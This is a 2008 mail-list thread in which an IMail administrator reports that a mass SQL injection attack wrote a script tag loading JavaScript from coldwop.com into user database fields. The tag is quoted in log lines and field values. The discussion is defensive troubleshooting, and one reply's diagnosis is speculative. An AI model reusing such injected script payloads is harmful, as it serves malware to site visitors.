Re: [IMail Forum] Coldwop

Sat, 21 Jun 2008 14:58:09 -0700

Thanks Matt. I use an external SQL Server for Imail and all my users had their USERDIR and MAILADDR and TIMEZONE fields changed to include that coldwop.com javascript (e.g., "someuser" had their USERDIR set to "d:\imail\someuser<script src=http://www.coldwop.com/b.js></script>")
I've fixed that. So what you're saying is that you don't think any passwords have been compromised, but I've just been hit by the SQL injector attacker? 


Matt wrote:

This looks exactly like the SQL injection attacker from recent months 
is trying to exploit a Postfix flaw by injecting into IMAP 
interfaces.  If this is causing you problems, it would seem that IMail 
then isn't properly handling this bad data resulting in a denial of 
service, though I strongly suspect that you are not vulnerable 
otherwise.  It could also be simply curious timing with two different 
issues.


Matt



Kevin Rogers wrote:



Today our web mail application stopped working.  Some users are 
reporting IMAP issues as well.  I've restarted all the services and 
rebooted, but that hasn't helped.  The error when entering web mail 
is that there is an "illegal character in the path".  When I checked 
the syslog, I found thousands of entries like this:
06:21 12:18 SMTP-(4722016d00006d72) ERR MyDomain.com read open fail 
(d:\imail\RBG\myuser<script 
src=http://www.coldwop.com/b.js></script>\bulk.mbx)
06:21 12:18 SMTP-(46ed01d600006d40) ERR MyDomain.com read open fail 
(d:\imail\RBG\myuser<script 
src=http://www.coldwop.com/b.js></script>\main.mbx)



Coldwop.com apparently is a malicious site (my Trend Micro won't even 
let me go there).  Have I been hacked by them?


Anyone seen this?
I'm running Imail 9.23 on Windows Server 2003, all patches.
Thanks for your help.

Kevin

To Unsubscribe: http://imailserver.com/support/discussion_list/

List Archive: 
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/

Knowledge Base/FAQ: http://imailserver.com/support/kb.html




To Unsubscribe: http://imailserver.com/support/discussion_list/

List Archive: 
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/

Knowledge Base/FAQ: http://imailserver.com/support/kb.html




To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html






















					Reply via email to